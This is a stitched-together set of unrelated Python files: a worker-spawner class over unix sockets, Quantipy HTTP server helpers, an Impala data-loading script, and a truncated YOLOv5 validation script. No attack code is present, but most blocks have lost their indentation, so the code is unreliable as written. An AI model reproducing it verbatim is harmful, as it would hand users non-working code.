def processLooksTerminated(self):
return False
def cleanupAfterAppearingDead(self):
raise UserWarning("This function makes no sense on an in-process worker")
class Spawner:
def __init__(self, socket_dir, selector_name, max_processes, outOfProcess):
self.outOfProcess = outOfProcess
self.workerType = OutOfProcessWorkerConnection if outOfProcess else InProcessWorkerConnection
self.selector_name = selector_name
self.socket_dir = socket_dir
self.max_processes = max_processes
self.selector_socket_path = os.path.join(socket_dir, selector_name)
self.busy_workers = []
self.waiting_workers = []
self.waiting_sockets = []
self.index = 0
def clearPath(self):
# Make sure the socket does not already exist
try:
os.unlink(self.selector_socket_path)
except OSError:
if os.path.exists(self.selector_socket_path):
raise UserWarning("Couldn't clear named socket at %s", self.selector_socket_path)
def teardown(self):
self.clearPath()
def start_worker(self):
index = self.index
self.index += 1
worker_name = "worker_%s" % index
worker_socket_path = os.path.join(self.socket_dir, worker_name)
newWorker = self.workerType(worker_name, self.socket_dir)
t0 = time.time()
TIMEOUT = 10
delay = 0.001
while not newWorker.answers_self_test() and time.time() - t0 < TIMEOUT:
time.sleep(delay)
delay *= 2
if not newWorker.answers_self_test(True):
raise UserWarning("Couldn't start another worker after " + str(time.time() - t0))
else:
self.waiting_workers.append(newWorker)
logging.info(
"Started worker %s/%s with %s busy and %s idle",
self.socket_dir,
worker_name,
len(self.busy_workers),
len(self.waiting_workers)
)
def terminate_workers(self):
for w in self.busy_workers + self.waiting_workers:
w.teardown()
def can_start_worker(self):
return self.max_processes is None or len(self.busy_workers) < self.max_processes
def get_valid_worker(self):
while True:
if not self.waiting_workers and self.can_start_worker():
self.start_worker()
elif self.waiting_workers:
#if we have one, use it
worker = self.waiting_workers.pop(0)
#make sure the worker is happy
if not worker.answers_self_test():
logging.error("Worker %s appears dead. Removing it.", worker.socket_name)
worker.teardown()
else:
return worker
else:
if not self.check_all_busy_workers():
return None
def check_all_busy_workers(self):
new_busy = []
for worker in self.busy_workers:
if worker.processLooksTerminated():
worker.cleanupAfterAppearingDead()
else:
new_busy.append(worker)
if len(new_busy) != len(self.busy_workers):
self.busy_workers = new_busy
logging.info("Now, we have %s busy and %s idle workers", len(self.busy_workers), len(self.waiting_workers))
return True
return False
def apply_worker_to_waiting_socket(self, worker):
self.busy_workers.append(worker)
waiting_connection = self.waiting_sockets.pop(0)
Common.writeString(waiting_connection.fileno(), worker.socket_name)
waiting_connection.close()
def start_workers_if_necessary(self):
self.check_all_busy_workers()
while self.waiting_sockets and self.can_start_worker():
worker = self.get_valid_worker()
assert worker is not None
self.apply_worker_to_waiting_socket(worker)
def listen(self):
logging.info("Setting up listening on %s with max_processes=%s", self.selector_socket_path, self.max_processes)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(self.selector_socket_path)
sock.listen(100)
try:
while True:
sock.settimeout(.1)
connection = None
try:
connection, _ = sock.accept()
except socket.timeout as e:
pass
if connection is not None:
if self.handleConnection(connection):
self.clearPath()
return
self.start_workers_if_necessary()
except KeyboardInterrupt:
logging.info("shutting down due to keyboard interrupt")
self.terminate_workers()
finally:
sock.close()
def handleConnection(self, connection):
first_byte = Common.readAtLeast(connection.fileno(), 1)
if first_byte == Messages.MSG_SHUTDOWN:
logging.info("Received termination message with %s busy and %s waiting workers", len(self.busy_workers), len(self.waiting_workers))
self.terminate_workers()
logging.info("workers terminating. Shutting down.")
connection.close()
return True
elif first_byte == Messages.MSG_GET_WORKER:
#try to start a worker
worker = self.get_valid_worker()
if worker is not None:
self.busy_workers.append(worker)
Common.writeString(connection.fileno(), worker.socket_name)
connection.close()
else:
#otherwise wait for one to come available
self.waiting_sockets.append(connection)
self.start_workers_if_necessary()
elif first_byte in (Messages.MSG_RELEASE_WORKER, Messages.MSG_TERMINATE_WORKER):
wantsTerminate = first_byte == Messages.MSG_TERMINATE_WORKER
worker_name = Common.readString(connection.fileno())
worker_ix = [ix for ix,w in enumerate(self.busy_workers) if w.socket_name == worker_name][0]
worker = self.busy_workers[worker_ix]
self.busy_workers.pop(worker_ix)
connection.close()
if wantsTerminate:
worker.teardown()
elif worker.answers_self_test():
#see if anybody wants to use this worker
if self.waiting_sockets:
self.apply_worker_to_waiting_socket(worker)
else:
self.waiting_workers.append(worker)
else:
logging.error("Worker %s appears dead. Removing it.", worker.socket_name)
worker.teardown()
else:
assert False, "unknown byte: " + first_byte
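# Illustrative sketch (not part of the original module): how a client asks the Spawner
# for a worker over its unix selector socket, mirroring the MSG_GET_WORKER branch of
# handleConnection above.  The function name is hypothetical; socket_dir/selector_name
# are whatever the Spawner was started with.
def request_worker_example(socket_dir, selector_name):
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        sock.connect(os.path.join(socket_dir, selector_name))
        Common.writeAllToFd(sock.fileno(), Messages.MSG_GET_WORKER)
        # The Spawner replies, once a worker is free or newly started, with the name
        # of the worker socket the client should connect to next.
        return Common.readString(sock.fileno())
    finally:
        sock.close()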
|
core.py
|
import socket
import socketserver
import threading
import json
import time
import os
import shutil
from shutil import copyfile
def copy_html_template(name, new_string=None, old_string=None,
path="core/srv/html_templates",
tmp_path="core/srv/tmp"):
""" Copies a file from html_templates/ to tmp/ and replaces a string
in the contents if it finds it.
"""
filepath = "{}/{path}/{name}".format(
os.getcwd(), path=path, name=name)
tmp_filepath = "{}/{path}/{name}".format(
os.getcwd(), path=tmp_path, name=name)
copyfile(filepath, tmp_filepath)
if all([new_string, old_string]):
with open(tmp_filepath, "w+b") as fout:
with open(filepath, "r+b") as fin:
for line in fin:
fout.write(line.replace(old_string, new_string))
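# Illustrative sketch (not part of the original module): typical use of
# copy_html_template().  The file name and placeholder strings are hypothetical; note
# the byte strings, since the template is copied and substituted in binary mode.
def copy_html_template_example():
    copy_html_template("report.html",
                       new_string=b"Quantipy report",
                       old_string=b"{{title}}")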
def save_string_in_tmp_folder(data, filename, path="core/srv/tmp"):
filepath = "{}/{path}/{name}".format(
os.getcwd(), path=path, name=filename)
with open(filepath, "w+b") as text_file:
text_file.write(data)
def open_tmp_file(filename):
filepath = "{}/core/srv/tmp/{name}".format(
os.getcwd(), name=filename)
return open(filepath, "r+b")
def cleanup_tmp_folder():
folder = "{}/core/srv/tmp".format(os.getcwd())
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception as e:
pass
# print e
def is_port_taken(host, port):
""" Return True/False depending on if the port is taken or not"""
socket = socketserver.socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host, port))
s.shutdown(1)
time.sleep(2)
return True
except:
return False
def shutdown_server(server_target):
""" Spawns a thread that triggers the TCPServer.shutdown method """
assassin = threading.Thread(target=server_target.shutdown)
assassin.daemon = True
assassin.start()
def print_server_message(host, port, handler):
print("Quantipy http server version 1.0")
print("Serving at: http://{host}:{port}".format(host=host, port=port))
print("Handler : {name}".format(name=handler.__name__))
def start_server(host, port, handler):
""" Starts a SimpleHTTPServer with a speciffic handler.
The handler needs to trigger the TCPServer.shutdown method or
else the server runs until doomsday.
"""
httpd = socketserver.TCPServer((host, port), handler)
print_server_message(host, port, handler)
httpd.serve_forever() # This is stopped by using the handler
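# Illustrative sketch (not part of the original module): a minimal handler that serves a
# single GET and then stops the server through shutdown_server(), which is the termination
# pattern start_server() expects.  The class name is hypothetical.
import http.server

class OneShotHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        super().do_GET()
        # shutdown_server() calls TCPServer.shutdown from a separate thread, so invoking
        # it from inside a request handler does not deadlock serve_forever().
        shutdown_server(self.server)

# Usage sketch: start_server("localhost", 8080, OneShotHandler)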
|
load-data.py
|
#!/usr/bin/env python
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
#
# This script is used to load the proper datasets for the specified workloads. It loads
# all data via Hive except for parquet data which needs to be loaded via Impala.
# Most ddl commands are executed by Impala.
import collections
import os
import re
import sqlparse
import subprocess
import sys
import tempfile
import time
import getpass
from itertools import product
from optparse import OptionParser
from Queue import Queue
from tests.beeswax.impala_beeswax import *
from threading import Thread
parser = OptionParser()
parser.add_option("-e", "--exploration_strategy", dest="exploration_strategy",
default="core",
help="The exploration strategy for schema gen: 'core', "\
"'pairwise', or 'exhaustive'")
parser.add_option("--hive_warehouse_dir", dest="hive_warehouse_dir",
default="/test-warehouse",
help="The HDFS path to the base Hive test warehouse directory")
parser.add_option("-w", "--workloads", dest="workloads",
help="Comma-separated list of workloads to load data for. If 'all' is "\
"specified then data for all workloads is loaded.")
parser.add_option("-s", "--scale_factor", dest="scale_factor", default="",
help="An optional scale factor to generate the schema for")
parser.add_option("-f", "--force_reload", dest="force_reload", action="store_true",
default=False, help='Skips HDFS exists check and reloads all tables')
parser.add_option("--impalad", dest="impalad", default="localhost:21000",
help="Impala daemon to connect to")
parser.add_option("--hive_hs2_hostport", dest="hive_hs2_hostport",
default="localhost:11050",
help="HS2 host:Port to issue Hive queries against using beeline")
parser.add_option("--table_names", dest="table_names", default=None,
help="Only load the specified tables - specified as a comma-seperated "\
"list of base table names")
parser.add_option("--table_formats", dest="table_formats", default=None,
help="Override the test vectors and load using the specified table "\
"formats. Ex. --table_formats=seq/snap/block,text/none")
parser.add_option("--hdfs_namenode", dest="hdfs_namenode", default="localhost:20500",
help="HDFS name node for Avro schema URLs, default localhost:20500")
parser.add_option("--workload_dir", dest="workload_dir",
default=os.environ['IMPALA_WORKLOAD_DIR'],
help="Directory that contains Impala workloads")
parser.add_option("--dataset_dir", dest="dataset_dir",
default=os.environ['IMPALA_DATASET_DIR'],
help="Directory that contains Impala datasets")
parser.add_option("--use_kerberos", action="store_true", default=False,
help="Load data on a kerberized cluster.")
options, args = parser.parse_args()
DATA_LOAD_DIR = '/tmp/data-load-files'
WORKLOAD_DIR = options.workload_dir
DATASET_DIR = options.dataset_dir
TESTDATA_BIN_DIR = os.path.join(os.environ['IMPALA_HOME'], 'testdata/bin')
AVRO_SCHEMA_DIR = "avro_schemas"
GENERATE_SCHEMA_CMD = "generate-schema-statements.py --exploration_strategy=%s "\
"--workload=%s --scale_factor=%s --verbose"
# Load data using Hive's beeline because the Hive shell has regressed (CDH-17222).
# The Hive shell is stateful, meaning that certain series of actions lead to problems.
# Examples of problems due to the statefulness of the Hive shell:
# - Creating an HBase table changes the replication factor to 1 for subsequent LOADs.
# - INSERTs into an HBase table fail if they are the first stmt executed in a session.
# However, beeline itself also has bugs. For example, inserting a NULL literal into
# a string-typed column leads to an NPE. We work around these problems by using LOAD from
# a datafile instead of doing INSERTs.
# TODO: Adjust connection string for --use_kerberos=true appropriately.
HIVE_CMD = os.path.join(os.environ['HIVE_HOME'], 'bin/beeline')
HIVE_ARGS = '-n %s -u "jdbc:hive2://%s/default;" --verbose=true'\
% (getpass.getuser(), options.hive_hs2_hostport)
HADOOP_CMD = os.path.join(os.environ['HADOOP_HOME'], 'bin/hadoop')
def available_workloads(workload_dir):
return [subdir for subdir in os.listdir(workload_dir)
if os.path.isdir(os.path.join(workload_dir, subdir))]
def validate_workloads(all_workloads, workloads):
for workload in workloads:
if workload not in all_workloads:
print 'Workload \'%s\' not found in workload directory' % workload
print 'Available workloads: ' + ', '.join(all_workloads)
sys.exit(1)
def exec_cmd(cmd, error_msg, exit_on_error=True):
ret_val = -1
try:
ret_val = subprocess.call(cmd, shell=True)
except Exception as e:
error_msg = "%s: %s" % (error_msg, str(e))
finally:
if ret_val != 0:
print error_msg
if exit_on_error: sys.exit(ret_val)
return ret_val
def exec_hive_query_from_file(file_name):
if not os.path.exists(file_name): return
hive_cmd = "%s %s -f %s" % (HIVE_CMD, HIVE_ARGS, file_name)
print 'Executing Hive Command: %s' % hive_cmd
exec_cmd(hive_cmd, 'Error executing file from Hive: ' + file_name)
def exec_hbase_query_from_file(file_name):
if not os.path.exists(file_name): return
hbase_cmd = "hbase shell %s" % file_name
print 'Executing HBase Command: %s' % hbase_cmd
exec_cmd(hbase_cmd, 'Error executing hbase create commands')
def exec_impala_query_from_file(file_name):
"""Execute each query in an Impala query file individually"""
is_success = True
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
try:
impala_client.connect()
with open(file_name, 'r+') as query_file:
queries = sqlparse.split(query_file.read())
for query in queries:
query = sqlparse.format(query.rstrip(';'), strip_comments=True)
print '(%s):\n%s\n' % (file_name, query.strip())
result = impala_client.execute(query)
except Exception as e:
print "Data Loading from Impala failed with error: %s" % str(e)
is_success = False
finally:
impala_client.close_connection()
return is_success
def exec_bash_script(file_name):
bash_cmd = "bash %s" % file_name
print 'Executing Bash Command: ' + bash_cmd
exec_cmd(bash_cmd, 'Error bash script: ' + file_name)
def generate_schema_statements(workload):
generate_cmd = GENERATE_SCHEMA_CMD % (options.exploration_strategy, workload,
options.scale_factor)
if options.table_names:
generate_cmd += " --table_names=%s" % options.table_names
if options.force_reload:
generate_cmd += " --force_reload"
if options.table_formats:
generate_cmd += " --table_formats=%s" % options.table_formats
if options.hive_warehouse_dir is not None:
generate_cmd += " --hive_warehouse_dir=%s" % options.hive_warehouse_dir
if options.hdfs_namenode is not None:
generate_cmd += " --hdfs_namenode=%s" % options.hdfs_namenode
print 'Executing Generate Schema Command: ' + generate_cmd
schema_cmd = os.path.join(TESTDATA_BIN_DIR, generate_cmd)
error_msg = 'Error generating schema statements for workload: ' + workload
exec_cmd(schema_cmd, error_msg)
def get_dataset_for_workload(workload):
dimension_file_name = os.path.join(WORKLOAD_DIR, workload,
'%s_dimensions.csv' % workload)
if not os.path.isfile(dimension_file_name):
print 'Dimension file not found: ' + dimension_file_name
sys.exit(1)
with open(dimension_file_name, 'rb') as input_file:
match = re.search('dataset:\s*([\w\-\.]+)', input_file.read())
if match:
return match.group(1)
else:
print 'Dimension file does not contain dataset for workload \'%s\'' % (workload)
sys.exit(1)
def copy_avro_schemas_to_hdfs(schemas_dir):
"""Recursively copies all of schemas_dir to the test warehouse."""
if not os.path.exists(schemas_dir):
print 'Avro schema dir (%s) does not exist. Skipping copy to HDFS.' % schemas_dir
return
exec_hadoop_fs_cmd("-mkdir -p " + options.hive_warehouse_dir)
exec_hadoop_fs_cmd("-put -f %s %s/" % (schemas_dir, options.hive_warehouse_dir))
def exec_hadoop_fs_cmd(args, exit_on_error=True):
cmd = "%s fs %s" % (HADOOP_CMD, args)
print "Executing Hadoop command: " + cmd
exec_cmd(cmd, "Error executing Hadoop command, exiting",
exit_on_error=exit_on_error)
def exec_impala_query_from_file_parallel(query_files):
# Get the name of the query file that loads the base tables, if it exists.
# TODO: Find a better way to detect the file that loads the base tables.
create_base_table_file = next((q for q in query_files if 'text' in q), None)
if create_base_table_file:
is_success = exec_impala_query_from_file(create_base_table_file)
query_files.remove(create_base_table_file)
# If loading the base tables failed, exit with a non zero error code.
if not is_success: sys.exit(1)
if not query_files: return
threads = []
result_queue = Queue()
for query_file in query_files:
thread = Thread(target=lambda x: result_queue.put(exec_impala_query_from_file(x)),
args=[query_file])
thread.daemon = True
threads.append(thread)
thread.start()
# Keep looping until the number of results retrieved is the same as the number of
# threads spawned, or until a data loading query fails. result_queue.get() will
# block until a result is available in the queue.
num_fetched_results = 0
while num_fetched_results < len(threads):
success = result_queue.get()
num_fetched_results += 1
if not success: sys.exit(1)
# There is a small window where a thread may still be alive even if all the threads have
# finished putting their results in the queue.
for thread in threads: thread.join()
def invalidate_impala_metadata():
print "Invalidating Metadata"
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
impala_client.connect()
try:
impala_client.execute('invalidate metadata')
finally:
impala_client.close_connection()
if __name__ == "__main__":
all_workloads = available_workloads(WORKLOAD_DIR)
workloads = []
if options.workloads is None:
print "At least one workload name must be specified."
parser.print_help()
sys.exit(1)
elif options.workloads == 'all':
print 'Loading data for all workloads.'
workloads = all_workloads
else:
workloads = options.workloads.split(",")
validate_workloads(all_workloads, workloads)
print 'Starting data load for the following workloads: ' + ', '.join(workloads)
loading_time_map = collections.defaultdict(float)
for workload in workloads:
start_time = time.time()
dataset = get_dataset_for_workload(workload)
generate_schema_statements(workload)
assert os.path.isdir(os.path.join(DATA_LOAD_DIR, dataset)), ("Data loading files "
"do not exist for (%s)" % dataset)
os.chdir(os.path.join(DATA_LOAD_DIR, dataset))
copy_avro_schemas_to_hdfs(AVRO_SCHEMA_DIR)
dataset_dir_contents = os.listdir(os.getcwd())
load_file_substr = "%s-%s" % (workload, options.exploration_strategy)
# Data loading with Impala is done in parallel, each file format has a separate query
# file.
create_filename = '%s-impala-generated' % load_file_substr
load_filename = '%s-impala-load-generated' % load_file_substr
impala_create_files = [f for f in dataset_dir_contents if create_filename in f]
impala_load_files = [f for f in dataset_dir_contents if load_filename in f]
# Execute the data loading scripts.
# Creating tables in Impala has no dependencies, so we execute them first.
# HBase table inserts are done via hive, so the hbase tables need to be created before
# running the hive script. Finally, some of the Impala inserts depend on hive tables,
# so they're done at the end.
exec_impala_query_from_file_parallel(impala_create_files)
exec_hbase_query_from_file('load-%s-hbase-generated.create' % load_file_substr)
exec_hive_query_from_file('load-%s-hive-generated.sql' % load_file_substr)
if impala_load_files: invalidate_impala_metadata()
exec_impala_query_from_file_parallel(impala_load_files)
loading_time_map[workload] = time.time() - start_time
invalidate_impala_metadata()
total_time = 0.0
for workload, load_time in loading_time_map.iteritems():
total_time += load_time
print 'Data loading for workload \'%s\' completed in: %.2fs'\
% (workload, load_time)
print 'Total load time: %.2fs\n' % total_time
|
val.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # YOLOv5 root directory
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import (
coco80_to_coco91_class,
check_dataset,
check_img_size,
check_requirements,
check_suffix,
check_yaml,
box_iou,
non_max_suppression,
scale_coords,
xyxy2xywh,
xywh2xyxy,
set_logging,
increment_path,
colorstr,
print_args,
)
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import output_to_target, plot_images, plot_val_study
from utils.torch_utils import select_device, time_sync
from utils.callbacks import Callbacks
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (
(xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist()
) # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, "a") as f:
f.write(("%g " * len(line)).rstrip() % line + "\n")
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append(
{
"image_id": image_id,
"category_id": class_map[int(p[5])],
"bbox": [round(x, 3) for x in b],
"score": round(p[4], 5),
}
)
def process_batch(detections, labels, iouv):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(
detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device
)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where(
(iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5])
) # IoU above threshold and classes match
if x[0].shape[0]:
matches = (
torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy()
) # [label, detection, iou]
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
# matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iouv.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
return correct
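# Illustrative sketch (not part of the original file): driving process_batch() with a
# single perfectly-overlapping prediction.  'iouv' mirrors the mAP@0.5:0.95 threshold
# vector built in run() below; boxes use the (x1, y1, x2, y2) format documented above.
def _process_batch_example():
    iouv = torch.linspace(0.5, 0.95, 10)
    detections = torch.tensor([[0.0, 0.0, 10.0, 10.0, 0.9, 0.0]])  # x1, y1, x2, y2, conf, class
    labels = torch.tensor([[0.0, 0.0, 0.0, 10.0, 10.0]])           # class, x1, y1, x2, y2
    correct = process_batch(detections, labels, iouv)
    assert correct.shape == (1, 10) and correct.all()  # IoU == 1.0 passes every threshold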
@torch.no_grad()
def run(
data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task="val", # train, val, test, speed or study
device="", # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project=ROOT / "runs/val", # save to project/name
name="exp", # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
model=None,
dataloader=None,
save_dir=Path(""),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(
Path(project) / name, exist_ok=exist_ok
) # increment run
(save_dir / "labels" if save_txt else save_dir).mkdir(
parents=True, exist_ok=True
) # make dir
# Load model
check_suffix(weights, ".pt")
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check image size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Data
data = check_dataset(data) # check
# Half
half &= device.type != "cpu" # half precision only supported on CUDA
model.half() if half else model.float()
# Configure
model.eval()
is_coco = isinstance(data.get("val"), str) and data["val"].endswith(
"coco/val2017.txt"
) # COCO dataset
nc = 1 if single_cls else int(data["nc"]) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Dataloader
if not training:
if device.type != "cpu":
model(
torch.zeros(1, 3, imgsz, imgsz)
.to(device)
.type_as(next(model.parameters()))
) # run once
pad = 0.0 if task == "speed" else 0.5
task = (
task if task in ("train", "val", "test") else "val"
) # path to train/val/test images
dataloader = create_dataloader(
data[task],
imgsz,
batch_size,
gs,
single_cls,
pad=pad,
rect=True,
prefix=colorstr(f"{task}: "),
)[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {
k: v
for k, v in enumerate(
model.names if hasattr(model, "names") else model.module.names
)
}
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
s = ("%20s" + "%11s" * 6) % (
"Class",
"Images",
"Labels",
"P",
"R",
"mAP@.5",
"mAP@.5:.95",
)
dt, p, r, f1, mp, mr, map50, map = (
[0.0, 0.0, 0.0],
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
)
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class = [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
t1 = time_sync()
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
t2 = time_sync()
dt[0] += t2 - t1
# Run model
out, train_out = model(img, augment=augment) # inference and training outputs
dt[1] += time_sync() - t2
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[
1
] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(
device
) # to pixels
lb = (
[targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else []
) # for autolabelling
t3 = time_sync()
out = non_max_suppression(
out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls
)
dt[2] += time_sync() - t3
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append(
(
torch.zeros(0, niou, dtype=torch.bool),
torch.Tensor(),
torch.Tensor(),
tcls,
)
)
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(
img[si].shape[1:], predn[:, :4], shape, shapes[si][1]
) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(
img[si].shape[1:], tbox, shape, shapes[si][1]
) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append(
(correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)
) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(
predn,
save_conf,
shape,
file=save_dir / "labels" / (path.stem + ".txt"),
)
if save_json:
save_one_json(
predn, jdict, path, class_map
) # append to COCO-JSON dictionary
callbacks.run("on_val_image_end", pred, predn, path, names, img[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f"val_batch{batch_i}_labels.jpg" # labels
Thread(
target=plot_images, args=(img, targets, paths, f, names), daemon=True
).start()
f = save_dir / f"val_batch{batch_i}_pred.jpg" # predictions
Thread(
target=plot_images,
args=(img, output_to_target(out), paths, f, names),
daemon=True,
).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(
*stats, plot=plots, save_dir=save_dir, names=names
)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(
stats[3].astype(np.int64), minlength=nc
) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = "%20s" + "%11i" * 2 + "%11.3g" * 4 # print format
print(pf % ("all", seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1e3 for x in dt) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
print(
f"Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}"
% t
)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.run("on_val_end")
# Save JSON
if save_json and len(jdict):
w = (
Path(weights[0] if isinstance(weights, list) else weights).stem
if weights is not None
else ""
) # weights
anno_json = str(
Path(data.get("path", "../coco")) / "annotations/instances_val2017.json"
) # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print(f"\nEvaluating pycocotools mAP... saving {pred_json}...")
with open(pred_json, "w") as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(["pycocotools"])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, "bbox")
if is_coco:
eval.params.imgIds = [
int(Path(x).stem) for x in dataloader.dataset.img_files
] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f"pycocotools unable to run: {e}")
# Return results
model.float() # for training
if not training:
s = (
f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}"
if save_txt
else ""
)
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument(
"--data", type=str, default=ROOT / "data/coco128.yaml", help="dataset.yaml path"
)
parser.add_argument(
"--weights",
nargs="+",
type=str,
default=ROOT / "yolov5s.pt",
help="model.pt path(s)",
)
parser.add_argument("--batch-size", type=int, default=32, help="batch size")
parser.add_argument(
"--imgsz",
"--img",
"--img-size",
type=int,
default=640,
help="inference size (pixels)",
)
parser.add_argument(
"--conf-thres", type=float, default=0.001, help="confidence threshold"
)
parser.add_argument(
"--iou-thres", type=float, default=0.6, help="NMS IoU threshold"
)
parser.add_argument(
"--task", default="val", help="train, val, test, speed or study"
)
parser.add_argument(
